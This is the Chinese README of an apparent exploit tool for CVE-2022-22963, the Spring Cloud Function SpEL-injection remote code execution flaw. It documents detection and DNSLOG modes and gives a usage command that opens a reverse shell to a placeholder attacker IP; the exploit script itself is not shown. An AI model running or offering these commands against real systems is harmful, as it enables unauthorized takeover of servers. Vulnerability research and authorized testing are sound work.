CVE-2022-22963-poc# CVE-2022-22963 漏洞检测与利用工具


## 漏洞简介
CVE-2022-22963 是 Spring Cloud Function 中的一个远程代码执行漏洞。该漏洞存在于 Spring Cloud Function 的路由功能中,攻击者可以通过发送特制的 HTTP 请求,利用 SpEL 表达式注入执行任意代码。
受影响版本:
- Spring Cloud Function < 3.1.7
- Spring Cloud Function < 3.2.3
## 工具功能
本工具提供以下功能:
- 漏洞检测:验证目标系统是否存在 CVE-2022-22963 漏洞
- DNSLOG 验证:通过 DNS 请求验证漏洞的可利用性
- 反弹 Shell:利用漏洞获取目标系统的反弹 Shell
## 环境要求
- Python 3.6+
- 依赖库:requests
安装依赖:
```bash
pip install requests
```
## 使用方法
### 基本用法
```bash
python3 CVE-2022-22963.py -u <目标URL> [选项]
```
### 参数说明
#### 基本参数
| 参数 | 说明 |
|------|------|
| `-h, --help` | 显示帮助信息 |
| `-u, --url` | 目标URL |
| `-v, --check` | 检测漏洞 |
#### 漏洞利用参数
| 参数 | 说明 |
|------|------|
| `-m, --mode {dnslog,shell}` | 利用方式: dnslog或shell |
| `-i, --ip` | 反弹shell的IP地址 |
| `-d, --dns` | dnslog网址 |
#### 高级选项
| 参数 | 说明 |
|------|------|
| `-p, --port` | 反弹shell端口 (默认: 9999) |
| `-t, --timeout` | 请求超时时间(秒) (默认: 5) |
## 使用示例
### 漏洞检测
```bash
python3 CVE-2022-22963.py -u http://example.com -v
```
### DNSLOG 验证
```bash
python3 CVE-2022-22963.py -u http://example.com -m dnslog -d your-domain.dnslog.cn
```
### 反弹 Shell
```bash
python3 CVE-2022-22963.py -u http://example.com -m shell -i your-server-ip -p 9999
```
## 工具演示
### 1. 漏洞检测

### 2. DNSLOG 验证


### 3. 反弹 Shell


## 更新日志
- 2023.12.28: 初始版本发布
- 2025.10.9: 代码重构,优化参数处理和错误处理
## 作者
- xmqaq
## 免责声明
本工具仅用于**安全研究、授权测试和教育目的**。使用本工具进行任何未经授权的测试或攻击行为是违法的,可能导致严重的法律后果。
使用本工具即表示您同意:
1. 仅在获得明确授权的系统上使用本工具
2. 遵守所有适用的法律法规
3. 对使用本工具造成的任何后果负完全责任
作者不对任何人因使用本工具而直接或间接导致的任何损失或损害承担责任。
**请负责任地使用本工具!**
## 许可证
本项目采用 MIT 许可证 - 详情请参阅 [LICENSE](LICENSE) 文件
[4.0K] /data/pocs/02e0c742f98a464c2e9932b3d62936dc785aabd9
├── [7.2K] CVE-2022-22963.py
└── [3.1K] README.md
0 directories, 2 files